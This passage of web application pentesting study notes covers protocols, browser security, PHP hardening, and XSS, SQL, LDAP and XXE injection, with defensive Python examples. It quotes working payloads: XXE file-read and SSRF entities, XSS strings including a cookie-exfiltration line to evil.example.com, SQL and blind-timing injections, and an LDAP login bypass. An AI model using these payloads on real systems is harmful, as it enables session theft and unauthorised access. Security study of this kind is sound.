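    return host == d or host.endswith("." + d)


def path_matches(cookie_path, request_path):
    """RFC 6265 path-match: prefix match on a '/' boundary."""
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"


def would_send(cookie, set_by_host, host, path="/", https=True):
    """Would a browser attach this cookie to a request for host/path?"""
    if "secure" in cookie.attrs and not https:
        return False
    domain = cookie.attrs.get("domain")
    if domain:
        host_ok = domain_matches(domain, host)
    else:
        host_ok = host.lower() == set_by_host.lower()  # host-only cookie (RFC 6265)
    return host_ok and path_matches(cookie.attrs.get("path", "/"), path)


if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        c = parse_set_cookie(header)
        print(c.name, lifetime_source(c), audit_cookie(c) or ["no findings"])
```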
SOAP
You can serve any content over HTTP such as HTML, images, sound, video, etc. SOAP is an XML-based encoding of
messages that are typically sent over HTTP. Just like HTTP sits on top of TCP/IP, SOAP sits on top of HTTP. Layers on
top of layers...
SOAP stands for Simple Object Access Protocol. It is an XML-based format used for sending and receiving messages; it is defined
within XML.
If you look at a SOAP request, you can see both layers, with the HTTP headers at the top, followed by the SOAP
message.
SOAP has three major characteristics:
 Extensibility (security and WS-Addressing are among the extensions under development)
 Neutrality (SOAP can operate over any protocol such as HTTP, SMTP, TCP, UDP, or JMS)
 Independence (SOAP allows for any programming model)
A document type definition (DTD) is a set of mark-up declarations that define a document type for an SGML-
family mark-up language (SGML, XML, HTML). A Document Type Definition (DTD) defines the legal building
blocks of an XML document. It defines the document structure with a list of legal elements and attributes.
After SOAP was first introduced, it became the underlying layer of a more complex set of web services, based on
DTD:
 Web Services Description Language (WSDL)
 XML schema
 Universal Description Discovery and Integration (UDDI)
Web Services Description Language (WSDL)
An XML-based application will have a WSDL file that defines the expected data format and request layout. This file
should be accessible.
The Web Services Description Language (WSDL) is an XML-based interface definition language that is used for
describing the functionality offered by a web service. The acronym is also used for any specific WSDL description of a
web service (also referred to as a WSDL file), which provides a machine-readable description of how the service can
be called, what parameters it expects, and what data structures it returns. Therefore, its purpose is roughly similar to
that of a type signature in a programming language.
The current version of WSDL is WSDL 2.0. The meaning of the acronym has changed from version 1.1 where the "D"
stood for "Definition".
Example WSDL file:
<?xml version="1.0" encoding="UTF-8"?>
<description xmlns="http://www.w3.org/ns/wsdl"
xmlns:tns="http://www.tmsws.com/wsdl20sample"
xmlns:whttp="http://schemas.xmlsoap.org/wsdl/http/"
xmlns:wsoap="http://schemas.xmlsoap.org/wsdl/soap/"
targetNamespace="http://www.tmsws.com/wsdl20sample">
<documentation>
This is a sample WSDL 2.0 document.
</documentation>
</description>
XML, XML schema and DTD
An XML schema is a description of a type of XML document. It tells users to develop their XML in such a schema.
Whereas an XML document is a form to communicate with another application or system (often disparate systems)
To ensure data is in right structure a DTD (Document Type Definition) can be used. This defines the elements that
may be included in your document, what attributes these elements have, and the ordering and nesting of the
elements.
The critical difference between DTDs and XML Schema is that XML Schema utilize an XML-based syntax, whereas
DTDs have a unique syntax held over from SGML DTDs. Although DTDs are often criticized because of this need to
learn a new syntax, the syntax itself is quite terse. The opposite is true for XML Schema, which are verbose, but also
make use of tags and XML so that authors of XML should find the syntax of XML Schema less intimidating.
The DTD is declared in a DOCTYPE declaration beneath the XML declaration contained within an XML document:
Inline Definition – where DTD is contained within the XML:
<?xml version="1.0"?>
<!DOCTYPE documentelement [definition]>
External Definition – Inline is handy for a few docs, but external definition reduces overhead by placing DTD on web
server:
<?xml version="1.0"?>
<!DOCTYPE documentelement SYSTEM "documentelement.dtd">
The lowest level of definition in a DTD is that something is either CDATA or PCDATA: Character Data, or Parsed
Character Data. We can only define an element as text, and with this limitation, it is not possible, for example, to
force an element to be numeric. Attributes can be forced to a range of defined values, but they can’t be forced to be
numeric.
XML Schema Definition (XSD) or XML Schemas provide a much more powerful means by which to define your XML
document structure and limitations. XML Schemas are themselves XML documents. They reference the XML Schema
Namespace and even have their own DTD. XML Schemas provide a set of basic types. These types are much wider
ranging than the basic PCDATA and CDATA of DTDs. They include most basic programming types such as integer,
byte, string and floating-point numbers, but they also expand into Internet data types such as ISO country and
language codes (en-GB for example).
XSD defines a schema, which is a definition of how an XML document can be structured. You can use it to check that
a given XML document is valid and follows the rules you've laid out in the schema. A producer has to read the XSD and
create XML that conforms to it, or the document won't be understood by another application or system that has been
developed with a different technology. For example, a company in Chicago provides an XSD template for a company in
Texas to write or generate their XML in the given XSD format. If the company in Texas fails to adhere to the rules laid down
in the XSD, then it is impossible to expect correct information to be exchanged with the company in Chicago.
WSDL is an XML document that describes a web service. It shows which operations are available and how data
should be structured to send to those operations. A WSDL may or may not embed an XSD to validate its message
structure; WSDL documents themselves have an associated XSD that shows what is valid to put in a WSDL document.
Example (figures not reproduced here): an XSD defines the elements for an XML document, and the XML document uses it;
the second figure is a WSDL which describes a web service called Book.
Browser Security
SOP - The same-origin policy is a security control found in most common browsers that restricts the way a document or
script (or other data) loaded from one origin can communicate with and access properties of another origin.
It's a crucial security concept underpinning web applications of all kinds.
Two pages are considered to have the same origin when the protocol (scheme), hostname and port number of their URLs are the same.
Keep in mind that the same-origin policy applies not only to JS but also to cookies, AJAX, Flash (but not images?), and so on. Data
stored inside localStorage is also governed by this policy, that is, origin-separated.
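The origin comparison described above, as an added example (not from the original notes): two URLs share an origin only when scheme, host and port all match, and a port left out of the URL is the scheme's default. The default-port table is an assumption limited to http/https/ws/wss.

```python
from urllib.parse import urlsplit

# Ports implied by the scheme: "http://example.com" and "http://example.com:80"
# are one origin because the port is implied. Assumption: only these schemes.
DEFAULT_PORTS = {"http": 80, "https": 443, "ws": 80, "wss": 443}


def origin_of(url):
    """Return the (scheme, host, port) triple that the same-origin policy compares."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = parts.hostname or ""          # urlsplit lower-cases the hostname
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)


def same_origin(url_a, url_b):
    """True when content loaded from url_a and url_b is treated as one origin."""
    return origin_of(url_a) == origin_of(url_b)


if __name__ == "__main__":
    # Constructed pairs: path and query never matter, scheme/host/port always do.
    pairs = [
        ("http://example.com/a", "http://example.com:80/b?x=1"),
        ("http://example.com", "https://example.com"),
        ("http://example.com", "http://example.com:8080"),
        ("http://example.com", "http://api.example.com"),
    ]
    for a, b in pairs:
        print(f"{str(same_origin(a, b)):5}  {a}  vs  {b}")
```

Note that a subdomain is a different origin, and that the same host over http and https is a different origin too, which is why a session set over https is not readable by script on the http page.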
G5 - Web Mark-up Languages
Web mark-up languages: HTML
XML
An XML DTD is a document which is used to validate an XML document against certain criteria; remember that an XML
document may be syntactically correct (well-formed) but still not follow the DTD. It acts as a validating template that defines
the valid structure, attributes, and elements for a certain XML document.
An XXE attack is based on the concept of external entities in XML. We can utilize the URI portion of external entities to do
nasty things such as reading files, exfiltration of data, server-side request forgery, or even executing arbitrary code.
<!DOCTYPE student [
<!ENTITY oops SYSTEM "file:///etc/passwd">
]>
SSRF
<!DOCTYPE student [
<!ENTITY oops SYSTEM "http://scanme.nmap.org:20/">
]>
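As an added defensive example (not from the original notes), this is how an application can refuse the two payloads above before they reach a resolving parser: external entities can only be declared inside a DTD, so a pre-scan with expat that aborts on any DOCTYPE or entity declaration closes off both the file read and the SSRF variant. The function names and the sample documents are constructed for this example.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET


class UnsafeXML(Exception):
    """Raised when untrusted XML carries a DOCTYPE or an entity declaration."""


def reject_dtd(data: bytes) -> None:
    """Pre-scan with expat and abort on any DOCTYPE / ENTITY declaration.

    Expat does not fetch external entities unless an ExternalEntityRefHandler
    is installed, and we abort before any entity could be referenced anyway.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE declaration for <{name}> is not allowed")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"entity declaration {name!r} (SYSTEM={sysid!r}) is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source only after the DTD check passes."""
    reject_dtd(data)
    return ET.fromstring(data)


def is_safe(data: bytes) -> bool:
    """Convenience wrapper for filters and tests: True when no DTD is present."""
    try:
        reject_dtd(data)
        return True
    except UnsafeXML:
        return False


# Constructed samples: the first mirrors the file:// entity shown above.
XXE_DOC = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE student [<!ENTITY oops SYSTEM "file:///etc/passwd">]>'
           b'<student>&oops;</student>')
BENIGN_DOC = b'<student><name>Ada</name></student>'

if __name__ == "__main__":
    print("xxe sample safe?   ", is_safe(XXE_DOC))
    print("benign sample safe?", is_safe(BENIGN_DOC))
    print("parsed name:", parse_untrusted(BENIGN_DOC).find("name").text)
```

Rejecting every DTD also stops internal-entity expansion attacks; if an application genuinely needs DTDs, the check has to be narrowed to SYSTEM/PUBLIC entities rather than removed.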
G6 - Web Programming Languages
Common web programming languages: JSP, ASP, PHP, CGI based Perl and JavaScript
JSP (Java Server Pages) and ASP (Active Server Pages) are two of the commonly used server-side scripting languages
that are used today in web development. ... ASP code is interpreted on the fly each time it is accessed, while JSP
pages can either be interpreted or compiled into a servlet.
PHP
 A common practice in PHP is to escape parameters using the function mysql_real_escape_string()
before sending the SQL query.
 eval() – Evaluate a string as PHP code. This is often used by an attacker to hide their code and tools on the
server itself. You can configure PHP to disable eval(). The eval() language construct is very dangerous
because it allows execution of arbitrary PHP code. Its use is thus discouraged.
 To restrict PHP information leakage, disable expose_php - expose_php = Off
 File uploads - You can disable file uploads in php.ini - file_uploads = Off
 Turn off remote code execution - If enabled, allow_url_fopen allows PHP's file functions, such as
file_get_contents() and the include and require statements, to retrieve data from remote
locations like an FTP or web site - allow_url_fopen = Off
 Enable SQL safe mode - sql.safe_mode = On
 Disable dangerous PHP functions - disable_functions
=exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,
show_source (but not call())
PHP Safe Mode
PHP Safe Mode - PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally
incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels
aren't very realistic, many people, especially ISP's, use safe mode for now. This feature has been DEPRECATED as of
PHP 5.3.0 and REMOVED as of PHP 5.4.0. Some of the major limitations of Safe Mode include the following.
 PHP File Uploads: On the DV server, the webserver runs as the Apache user. So, all files that are uploaded via
PHP are owned by Apache. This may cause ownership problems for many users.
 File Modifications: Moving, copying, and changing ownership and permissions of files can only be done when
they are owned by the administrative user.
 System Commands: PHP scripts cannot use the exec() and system() functions, which means that shell
commands cannot be run from within a PHP script.
 Most script kiddies try to exploit PHP applications such as WordPress using the exec(), passthru(),
shell_exec(), system(), popen() and proc_open() functions.
 exec — Execute an external program,
 shell_exec — Execute command via shell and return the complete output as a string
 system — Execute an external program and display the output
 __call – PHP magic method; the __ prefix reserves the method name as magical. Not used for system commands.
If the safe_mode directive is enabled, PHP places restrictions on the use of some dangerous functions. Some
functions are disabled, and others are subject to limitations on their use. For example:
 The shell_exec function is disabled because it can be used to execute operating system commands.
 The mail function has the parameter additional_parameters disabled because unsafe use of this parameter
may lead to SMTP injection flaws
 The exec function can be used only to launch executables within the configured safe_mode_exec_dir.
Metacharacters within the command string are automatically escaped.
If the magic_quotes_gpc directive is enabled, any single quote, double quote, backslash, and NULL characters
contained within request parameters are automatically escaped using a backslash.
 allow_url_fopen - If disabled, this directive prevents some file functions from accessing remote files
 allow_url_include If disabled, this directive prevents the PHP file include functions from being used to
include a remote file.
 display_errors If disabled, this directive prevents PHP errors from being reported to the user’s browser.
 file_uploads If enabled, this directive causes PHP to allow file uploads over HTTP.
 upload_tmp_dir Temporary directory used to store uploaded files. Ensures sensitive files are not stored in a
world-readable location.
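The two directive lists above (the hardening settings under PHP and the safe-mode-era directives just listed) can be checked mechanically. The following is an added example, not part of the original notes: a small php.ini parser and an audit against a baseline built from those directives. The baseline, the rationale strings and the two sample ini files are constructed for this example.

```python
# Hardened value per directive (False = Off), with the reason from the notes.
# Constructed baseline; adapt to what the application actually needs.
BASELINE = {
    "expose_php": (False, "hide the PHP version from the X-Powered-By header"),
    "allow_url_fopen": (False, "file functions must not fetch remote URLs"),
    "allow_url_include": (False, "include/require must not load remote code"),
    "display_errors": (False, "keep errors and paths out of the browser"),
    "file_uploads": (False, "no uploads unless the application needs them"),
}
# Functions the notes list as commonly abused for command execution.
MUST_DISABLE = {"exec", "passthru", "shell_exec", "system", "proc_open", "popen"}


def php_bool(value):
    """php.ini accepts On/Off, 1/0, True/False and Yes/No for boolean directives."""
    return value.strip().strip('"').lower() in ("1", "on", "true", "yes")


def parse_php_ini(text):
    """Return {directive: value}; ';' starts a comment, [section] lines are skipped."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def audit_php_ini(text):
    """Return a list of findings; an empty list means the baseline is met."""
    settings = parse_php_ini(text)
    findings = []
    for directive, (wanted, why) in BASELINE.items():
        if directive not in settings:
            findings.append(f"{directive} not set explicitly ({why})")
        elif php_bool(settings[directive]) != wanted:
            findings.append(f"{directive} = {settings[directive]} ({why})")
    disabled = {f.strip() for f in settings.get("disable_functions", "").split(",")}
    missing = sorted(MUST_DISABLE - disabled)
    if missing:
        findings.append("disable_functions does not cover: " + ", ".join(missing))
    return findings


# Constructed samples, not taken from any real server.
WEAK_INI = """\
[PHP]
; development settings left on a production host
expose_php = On
allow_url_fopen = On
allow_url_include = Off
display_errors = On
file_uploads = On
disable_functions = exec,shell_exec
"""

HARDENED_INI = """\
[PHP]
expose_php = Off
allow_url_fopen = Off
allow_url_include = Off
display_errors = Off
file_uploads = Off
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name + ":", audit_php_ini(ini) or "no findings")
```

A directive that is absent is reported rather than assumed safe, because PHP's compiled-in defaults (expose_php and allow_url_fopen default to On) are not the hardened values.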
G7 - Web Application Servers
Vulnerabilities in common application frameworks, servers and technologies: .NET, J2EE, Cold fusion, Ruby on Rails
and AJAX.
G8 - Web APIs
Application interfaces: CGI (like my old contact us Perl script), ISAPI filters (like iirf.ini) and Apache modules (like
mod_mysql).
G9 - Web Sub-Components
Web architecture sub-components: Thin/Thick web clients, servlets and applets, Active X.
A thin web application can be considered as one with centrally operated or managed applications. For example, a
web application running through a central operational server, where its users don't have to hold all the necessary
software or hardware packages, because all the processing is done centrally and not on the user's side.
A thick application, by contrast, is for example a device or platform running Microsoft's heavy applications on specific
hardware. All operations and processing are done locally, as thick
applications don't depend on any centrally managed server or unit.
Flash
Flash objects run in the Flash virtual machine, and, like Java applets, are sandboxed from the host computer.
Flash Player security follows a sandbox security model. This means that files and other data gathered by the Flash
Player are sorted in isolated security sets called sandboxes.
https://twitter.com/testalways/status/990623934599938048?s=09
To decompile and disassemble Flash, you can use the following tools:
 Flasm — www.nowrap.de/flasm
 Flare — www.nowrap.de/flare
 SWFScan — www.hp.com/go/swfscan (this works for Actionscript 2 and 3)
.Net Thick Clients
Java Applets
Buffer overflow in Java Applets?
Java - Sandbox Model
 Automatic garbage collection
 Secure class loading and verification mechanism ensures that only legitimate Java code is executed. A Java
Code Signing Certificate allows you to sign all kinds of Java applications and applets. When you sign your Java
code using a Java Code Signing Certificate, your users will know that it comes from a trusted source (you)
and that it hasn't been tampered with since you signed it.
 Sandbox provides a very restricted environment in which to run untrusted code obtained from the open
network
 The essence of the sandbox model is that local code is trusted to have full access to vital system resources
(such as the file system) while downloaded remote code (an applet) is not trusted and can access only the
limited resources provided inside the sandbox.
 One of the most significant advantages of languages such as C# and Java is that programmers do not need
to worry about the kind of buffer management and pointer arithmetic problems that have affected software
developed in native languages such as C and C++
Stack and Heap
There are two main types of data structure in a process that are used for memory management: the stack and the
heap. The stack is a LIFO (last in, first out) structure (like a pile of plates), which is used mainly for storage of local
variables and data related to function calls.
Buffer overflow vulnerabilities occur when an application copies user-controllable data into a memory buffer that is
not sufficiently large to accommodate it. The destination buffer is overflowed, resulting in adjacent memory being
overwritten with the user’s data.
Stack Overflows: Buffer overflows typically arise when an application uses an unbounded copy operation (such as
strcpy in C) to copy a variable-size buffer into a fixed-size buffer without verifying that the fixed-sized buffer is large
enough.
Heap Overflows: Same kind of unsafe operation as described previously, except that the overflowed destination
buffer is allocated on the heap, not the stack. Memory on the heap is dynamically allocated by the application at
run-time and typically contains program data.
AJAX
The name originally was an acronym for “Asynchronous JavaScript and XML,” although in today’s web Ajax requests
need not be asynchronous and need not employ XML. With Ajax, some user actions are handled within client-side
script code and do not cause a full reload of the page. Instead, the script performs a request “in the background” and
typically receives a much smaller response that is used to dynamically update only part of the user interface. The
core technology used in Ajax is XMLHttpRequest.
De-compilation of client-side code
Java: JAD
Appendix H: Web Testing Methodologies
H1 - Web Application Reconnaissance
Benefits of performing application reconnaissance.
Discovering the structure of web applications.
Methods to identify the use of application components defined in G1 to G9.
H2 - Threat Modelling and Attack Vectors
Simple threat modelling based on customer perception of risk.
Relate functionality offered by the application to potential attack vectors.
H3 - Information Gathering from Web Mark-up
Examples of the type of information available in web page source that may prove useful to an attacker:
 Hidden Form Fields
 Database Connection Strings
 Credentials
 Developer Comments
 Other included files
 Authenticated-only URLs
H4 - Authentication Mechanisms
Common pitfalls associated with the design and implementation of application authentication mechanisms.
 Brute Force
 Password complexity
 Password Recovery Mechanism
 Store Passwords in a Secure Fashion
 Transmit Passwords Only Over TLS or Other Strong Transport
 Authentication and Error Messages
H5 - Authorisation Mechanisms
Common pitfalls associated with the design and implementation of application authorisation mechanisms.
 User roles must be enforced on all endpoints
H6 - Input Validation
The importance of input validation as part of a defensive coding strategy.
How input validation can be implemented and the differences between white listing, black listing and data
sanitisation.
A blacklist refers to testing a desired input against a list of negative inputs. Thus, you would compile a list of
all the negative or bad conditions and then verify that the input received is not one of those bad or
negative conditions.
A whitelist refers to testing a desired input against a list of possible correct inputs. For this, you would
compile a list of all the good input values/conditions, then verify that the input received is one of those correct
conditions.
For example, consider automatically rejecting incoming phone calls. You could have a black list of marketing
companies, so everyone but them would be able to call you. Or you could have a white list containing your friends'
numbers, so only they would be able to call you.
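The three approaches (black listing, white listing and sanitisation) side by side, as an added example that is not part of the original notes. The denylist fragments, the username pattern and the sample inputs are constructed for the example; the point it shows is that a denylist only catches what its author thought of, while an allowlist rejects everything it did not expect.

```python
import re

# Constructed denylist, of the kind an application author might write by hand.
DENYLIST = ["<script", "javascript:", "' or ", "--"]

# Allowlist: the exact shape a username is permitted to have, nothing else.
USERNAME_RE = re.compile(r"^[a-z0-9_]{3,16}$")


def denylist_ok(value):
    """Black listing: accept unless a known-bad fragment appears."""
    return not any(bad in value for bad in DENYLIST)


def allowlist_ok(value):
    """White listing: accept only if the whole value matches the expected pattern."""
    return USERNAME_RE.fullmatch(value) is not None


def sanitise_username(value):
    """Sanitisation: strip what is not allowed, then re-validate the remainder.

    Returns the cleaned username, or None when nothing valid is left.
    """
    cleaned = re.sub(r"[^a-z0-9_]", "", value.lower())[:16]
    return cleaned if allowlist_ok(cleaned) else None


if __name__ == "__main__":
    for sample in ["alice_01", "<script>x", "<SCRIPT>x", "Alice <b>01</b>"]:
        print(f"{sample!r:20} deny={denylist_ok(sample)!s:5} "
              f"allow={allowlist_ok(sample)!s:5} sanitised={sanitise_username(sample)!r}")
```

Note what sanitisation does to the last sample: it produces a valid but different value, so it changes meaning silently; rejecting (allowlist) is the safer default, with sanitisation reserved for fields where a best-effort clean-up is acceptable.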
H7 - Application Fuzzing
Fuzzing and its relevance within web-app penetration testing.
The use of fuzz strings and their potential effects.
Potential dangers of fuzzing web applications.
H8 - Information Disclosure in Error Messages
How error messages may indicate or disclose useful information.
H9 - Use of Cross Site Scripting Attacks (XSS)
Potential implications of a cross site scripting vulnerability. Ways in which the technique can be used to benefit an
attacker.
The double forward slash // starts a comment in JavaScript.
JavaScript – document.cookie
Alert Box
<script>alert("I am an alert box!");</script>
Note the close bracket is followed by a ; This also works with single or double quotes, but not when the alert call is wrapped in < > or
when either ' or " is missing from ( ). There can be any number of extra < and > around the script element: <<<script>alert("I am an alert
box!");</script>>>>>>>>>>>>>>>>>
As in SQL, the quotes represent strings (remember never to quote integers). There is a difference between using
single and double quotes.
document.cookie
document.cookie – The following, when saved as a bookmark, will display the contents of an alert box in the browser, as above:
javascript:alert('document.cookie');
...but remove the ' ' (single or double) and it'll return the cookies of the loaded site in a pop-up alert box, because the
contained text stops being a string and becomes code:
This will return the cookies of the site if loaded via stored XSS.
document.write(document.cookie); - This will print the cookie in the page (as opposed to a pop-up
alert)
<script>document.cookie = "username=Logged into Internet Bank"; </script> - You can create a cookie
using document.cookie.
<<script>alert<"XSS">;//<</script> # Invalid JS, invalid < > plus // comment
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
";alert('XSS');// # No <Script> - will not run…
<BODY ONLOAD=alert('XSS')> # No <Script> - will not run…
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> # No <Script> - will not run…
window.location='http://evil.example.com/?cookie='+document.cookie
<a href="javascript:alert('myxssruns')">Click Me</a>
javascript:alert(1)
<a href="javascript:alert(1)">Skip</a>
javascript://%0d%0aalert(1);
javascript://%0d%0aalert(1);//http://derp.com
javascript://%0d%0alert(1);//.com
search/"><imgsrc=x onerror=alert(1);
<script>alert(12345)</script>
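The defensive counterpart to the payloads above, as an added example (not from the original notes): output encoding renders the script and attribute-breaking strings inert, and the HttpOnly flag keeps the session token out of document.cookie even if a script does run. The render functions and the token value are constructed for the example.

```python
import html
from http.cookies import SimpleCookie


def render_comment(user_text):
    """Reflect user input into an HTML text node with every special char encoded."""
    return '<p class="comment">' + html.escape(user_text, quote=True) + "</p>"


def render_attribute(user_text):
    """Attribute context: always quote the attribute and encode quotes inside it."""
    return '<input type="text" value="' + html.escape(user_text, quote=True) + '">'


def session_cookie_header(token):
    """Set-Cookie for a session token: HttpOnly hides it from document.cookie,
    Secure keeps it off plain HTTP, SameSite=Strict limits cross-site sending."""
    cookie = SimpleCookie()
    cookie["session"] = token
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Strict"
    return cookie.output(header="Set-Cookie:").strip()


if __name__ == "__main__":
    # Constructed inputs in the shape of the notes' test strings.
    print(render_comment('<script>alert(12345)</script>'))
    print(render_attribute('"><img src=x onerror=alert(1)>'))
    print(session_cookie_header("tok-constructed"))
```

Encoding is context-specific: html.escape is right for element text and quoted attributes, but a value placed inside a script block or a URL needs that context's own encoding, and the cookie flags do nothing for XSS payloads that act on the page directly rather than stealing the token.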
H10 - Use of Injection Attacks
Potential implications of injection vulnerabilities:
SQL injection
Use of '
 Integer values will not be in quotes (as quoting them will turn them into strings - don't quote numbers).
Strings such as username, password or resource name will be in ' ', and for them add the ' at the end, as maybe
the coder did not enter ' to indicate the start of the user-entered variable.
 The final '; will be in the SQL code (assuming an integer value is used). On the client side you do not add it. For example:
' OR '1'='1 in the query becomes '' OR '1'='1'; If you cut into the query by commenting out the end of the query in the code, then add
';
 ...though I have seen ' being added at the end so the injected query will be with your entered ' ' This was for
BLIND based which may be string data. For example:
Password box: ' AND (SELECT id FROM user LIMIT 1)=' which leads to the query: SELECT * FROM users
WHERE username = 'admin' AND password = '' AND (SELECT id FROM user LIMIT 1) = '';
Examples from book – Note all start with ' " OR, integers are not quoted, and the line ends with a comment or nothing.
' OR 1=1--
" OR 1=1--
OR 1=1--
' OR 'a'='a
" OR "a"="a
') OR ('a'='a
BLIND Based SQL Injection
Microsoft SQL: ?id=1' waitfor delay '00:00:10'-- can also use WAITFOR TIME 'hh:mm:ss' (WAITFOR TIME is
rarely used, but it could help bypass weak blacklist filters that only check for the popular WAITFOR DELAY
instruction.)
MySQL: BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')) – can also use sleep(10)
Using some time-taking operation e.g. BENCHMARK(), will delay server responses if the expression is True. Above
will execute the ENCODE function 5000000 times.
PostgreSQL: pg_sleep() - pg_sleep(10)
Oracle: The SLEEP() function can be used, however it needs to be integrated in a PL/SQL block:
BEGIN DBMS_LOCK.SLEEP(15); END;
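The quoting rules described under "Use of '" above, shown against a real query engine as an added example (not from the original notes): a login check that wraps the user's value in '...' and concatenates it, beside the parameterised form that fixes it. The table, the account and the helper names are constructed for the example; sqlite3 is used so it runs offline.

```python
import sqlite3


def make_db():
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret-constructed')")
    return conn


def login_concatenated(conn, username, password):
    """The coder opens and closes the quotes, the user's text lands between them: vulnerable."""
    query = ("SELECT id FROM users WHERE username = '" + username +
             "' AND password = '" + password + "';")
    return conn.execute(query).fetchone() is not None


def login_parameterised(conn, username, password):
    """Placeholders: values travel separately from the SQL, so a ' stays data."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?;"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    # The notes' string payload, supplied in the password box: ' OR '1'='1
    payload = "' OR '1'='1"
    print("concatenated, real password :", login_concatenated(conn, "admin", "s3cret-constructed"))
    print("concatenated, payload       :", login_concatenated(conn, "admin", payload))
    print("parameterised, payload      :", login_parameterised(conn, "admin", payload))
```

With the payload the concatenated query reads `... AND password = '' OR '1'='1';`, and because AND binds tighter than OR the row matches regardless of the password; the parameterised version compares the password column against the literal eleven-character string and finds nothing.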
LDAP injection
Query Types - Simple match conditions, Disjunctive (several search queries from several sources, like multiple ORs),
Conjunctive (like username and password)
The main way LDAP stores names is based on the DN (distinguished name).
A DN might look like this: cn=Richard Feynman, ou=Physics Department, dc=Caltech, dc=edu
There are certain characters that are considered special characters (Boolean conditions and group aggregations) in a
DN. The exhaustive list is the following: ',', '\', '#', '+', '<', '>', ';', '"', '=', and leading or trailing spaces (but not ? – remember
you cannot escape ? in Perl either…)
Active Directory requires that the following ten characters be escaped with the backslash "\" escape character if
they appear in any of the individual components of a distinguished name:
Some characters that are allowed in distinguished names and do not need to be escaped include:
* ( ) . & - _ [ ] ` ~ | @ $ % ^ ? : { } ! ' # Hence anything but Boolean, except for or |
LDAP injection is a server-side attack, which could allow sensitive information about users and hosts represented in
an LDAP structure to be disclosed, modified, or inserted. This is done by manipulating input parameters afterwards
passed to internal search, add, and modify functions. A web application could use LDAP in order to let users
authenticate or search other users' information inside a corporate structure.
Boolean conditions and group aggregations on an LDAP search filter could be applied by using the following
metacharacters:
Let's suppose we have a web application using a search filter like the following one:
searchfilter="(cn="+user+")"
which is instantiated by an HTTP request like this:
http://www.example.com/ldapsearch?user=John
If the value 'John' is replaced with a '*', by sending the request:
http://www.example.com/ldapsearch?user=*
the filter will look like:
searchfilter="(cn=*)"
which matches every object with a 'cn' attribute equal to anything.
If the application is vulnerable to LDAP injection, it will display some or all of the users' attributes, depending on the
application's execution flow and the permissions of the LDAP connected user.
A tester could use a trial-and-error approach, by inserting in the parameter ( | & * and the other characters, in order
to check the application for errors.
By using the following values:
user=*)(uid=*))(|(uid=*
pass=password
the search filter will result in:
searchlogin="(&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))";
which is correct and always true. This way, the tester will gain logged-in status as the first user in the LDAP tree.
Characters that may be used to interfere with the LDAP query should be blocked, including:
( ) | & * ) ; , = and the null byte (%00)
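Rather than blocking those characters, the usual fix is to escape them so they lose their filter meaning. The following is an added example, not from the original notes: RFC 4515 escaping for search-filter values, applied to the login filter discussed above. The builder functions are constructed for the example; the escape table is the RFC 4515 one.

```python
# RFC 4515: these characters must be written as \XX hex escapes inside a filter value.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value):
    """Escape a user-supplied value for use inside an LDAP search filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter(user, password_hash):
    """The notes' (&(uid=...)(userPassword=...)) login filter, with escaping applied."""
    return "(&(uid=%s)(userPassword=%s))" % (
        escape_filter_value(user), escape_filter_value(password_hash))


def build_login_filter_unsafe(user, password_hash):
    """Same filter built by plain concatenation, for comparison only."""
    return "(&(uid=%s)(userPassword=%s))" % (user, password_hash)


if __name__ == "__main__":
    injected_user = "*)(uid=*))(|(uid=*"          # the value from the notes
    pw_hash = "{MD5}X03MO1qnZdYdgyfeuILPmQ=="     # the hash from the notes
    print("unsafe :", build_login_filter_unsafe(injected_user, pw_hash))
    print("escaped:", build_login_filter(injected_user, pw_hash))
    print("normal :", build_login_filter("John", pw_hash))
```

After escaping, the injected value is one long literal compared against uid, so the extra (|(uid=*)) clause never forms and the filter can only match a user whose uid really contains those characters. Escaping filter values is separate from escaping DN components (the comma, plus and so on listed earlier), which follow RFC 4514 rules.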
Code injection
XML injection - XXE
An XML External Entity attack occurs when an application parses XML input and a reference to an external entity is
processed by a weakly configured XML parser. (It does not have to be an external XML document; it can be any external file – the exam
asked this.)
CRLF Injection
The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). Also known as HTTP response splitting.
